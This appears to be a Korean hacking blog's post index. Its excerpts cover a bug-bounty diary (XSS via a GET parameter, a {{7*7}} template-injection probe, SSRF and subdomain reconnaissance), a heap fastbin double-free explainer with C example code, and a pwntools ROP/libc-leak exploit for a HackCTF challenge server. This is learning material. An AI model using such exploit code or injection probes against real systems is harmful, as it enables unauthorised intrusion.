본문 바로가기

전체 글

(109)
Bug Bounty - 6 # 시작 오랜만에 글을 쓰는 것 같다. 그동안 할만한 프로그램을 찾고 시도하고를 반복했다. 그 중 1개 프로그램에서 취약점을 찾았지만 역시 중복이었다. # 중간 내가 작성한 스크립트를 돌리고 나서 수집된 링크를 쭉 확인하는데 메시시지를 출력하는 페이지가 눈에 띄었다. 해당 메시지는 GET 방식으로 파라미터를 통해 전달된 문자를 출력해주고 있었다. 그래서 xss를 테스트를 했고 트리거 되었다. 그 후 기분 좋게 신고 \ 끝 하지만 중복이었죠? ㅋㅋ 뭔가 자신만의 특정 취약점을 찾는 방법을 쭉 나열해서 빠르게 시도하는 방법을 사용해야겠다.
Bug Bounty - 5 간단 메모 어제 한 프로그램을 살펴보면서 시간을 보냈다. 한 기능에서 테스트로 {{7*7}}를 보내 49가 봔환된걸 봐서 SSTI 인줄 알았지만 CSTI였다. (심지어 self 임) 이걸 어디서 사용할 수 있는 방법이 없을까 생각했지만 없는 것 같다. 끝 해킹은 끈기!
Bug Bounty - 4 시작 버그바운티를 처음 시작하는 사람들이 많이 실수하는 경우라는 글을 읽었다. 돈을 목적으로 한다. 빨리 포기한다. 적절한 방법론이 없다. 남과 비교를 한다. 이렇게 4가지 였다. 4가지 중에 3번이 가장 많이 와닿는다. 그래서 어떤걸 찾을까 고민하던 중 재밌는 보고서를 찾았다. 바로 SSRF이다. SSRF를 잘 모르는 사람은 한번 공부해보길 바란다. 아주 재미있는 친구이다. 중간 그럼 SSRF를 어떻게 찾고 어느 지점까지 와야 신고가 가능한지, 해당 리포트에서 한번 보겠다. https://systemweakness.com/bug-bounty-how-i-found-an-ssrf-reconnaissance-7b1821a1b1fd 내용을 단계적으로 간단하게 요약하면 이렇다. 구글 dork를 이용해서 버그바운..
Bug Bounty - 3 시작 잠시 일이 생겨 글을 작성하지 못했다. 계속 공부해야지.. 중간 1, 2 내용을 토대로 서브도메인을 가져오는 스크립트를 작성했다. 성능은 뭐 나쁘지 않은 정도? 얻은 정보를 가지고 할 수 있는 것을 찾아봐야겠다. 끝 오늘은 간단하게 적어야지. 다음글이나 다다음글에는 아마 버그바운티 리포트 내용을 리뷰할 거 같다.
Bug Bounty - 2 시작 Bug Bounty - 1 과 이어서 이어서 정찰 관련이다. recon 대상은 많이 있지만 Subdomain 관련으로 작성할 예정이다. 수 많은 recon 부분 글을 읽었지만 강조하는 점이 있었다. 최대한 많은 정보를 얻어라."당연히 정보를 많이 얻으면 타겟이 늘어나니까 중요한거 아니야?" 라고 생각 할 수 있다. 맞는 말이긴 하다. *.target.com 이 존재하면 traget.com 보다 asdf.target.com, aaa.target.com 을 아는 것이 취약점 탐색할 타겟이 더 있다는 뜻이 되니까 하지만 이게 말처럼 쉽지가 않았다. 글 몇개 찾아보면 알겠지만 거의 비슷한 도구를 사용해서 거의 비슷한 결과를 얻을 것이다. 저런 글을 공유하는 사람과 버그바운티를 하면서 거의 비슷한 타겟을 손..
Bug Bounty - 1 * 그냥 일기 처럼 벅바 리포트 구경한거 기록할 예정 * 처음 웹해킹을 좋아하지만 한동안 공부를 하지 않았다. 컴퓨터 앞에 앉기 너무 귀찮아서 ㅋㅋ 그래서 이제라도 다시 시작할 예정. 근데 CTF 는 또 별로 안 좋아해서 버그바운티 쪽으로 여러 리포트 구경도 하고 취약점을 찾는 쪽으로 하기로 했다. 목표는 유효 취약점 발견으로... 언젠가 발견할 수 있겠지 라는 생각으로 레츠고 중간 아래 글을 읽고 나서 처음에는 정찰 부분 부터 찾아봤다. https://blog.voorivex.team/9240-bounty-in-30-days-hunt-challenge 글을 읽어 보면 정찰로 6k를 번것을 확인 할 수 있는데 무슨 취약점이 있길래 정찰로만 버그바운티를 할 수 있는지 궁금했다. 뭐 더 있을 수 있겠지만 S..
Heap - Fastbin dup Fastbin dup Double Free 버그를 이용하여 fastbin freelist를 조작해 이미 할당된 메모리에 다시 힙 청크를 할당하는 공격 기법 예제 코드 #include #include #include char name[16]; int overwrite_me; int main() { int ch, idx; int i = 0; char *ptr[10]; setvbuf(stdout, 0, 2, 0); setvbuf(stdin, 0, 2, 0); printf("Name : "); read(0, name, 16); while (1) { printf("> "); scanf("%d", &ch); switch(ch) { case 1: if( i >= 10 ) { printf("Do not overflow..
HackCTF - Unexploitable #1 system 함수를 이용해서 leak를 할 수 있다는 것을 처음 알았다 leak을 하고 rtl를 진행하면 된다 from pwn import * r = remote('ctf.j0n9hyun.xyz', 3023) e = ELF('./Unexploitable_1') context.arch = 'amd64' pr = 0x00000000004007d3 payload = 'A'*24 payload += p64(pr) payload += p64(e.got['setvbuf']) payload += p64(e.sym['system']) payload += p64(e.sym['main']) r.sendline(payload) r.recvuntil('1: ') leak = u64(r.recv(6) + '\x00\x00') ..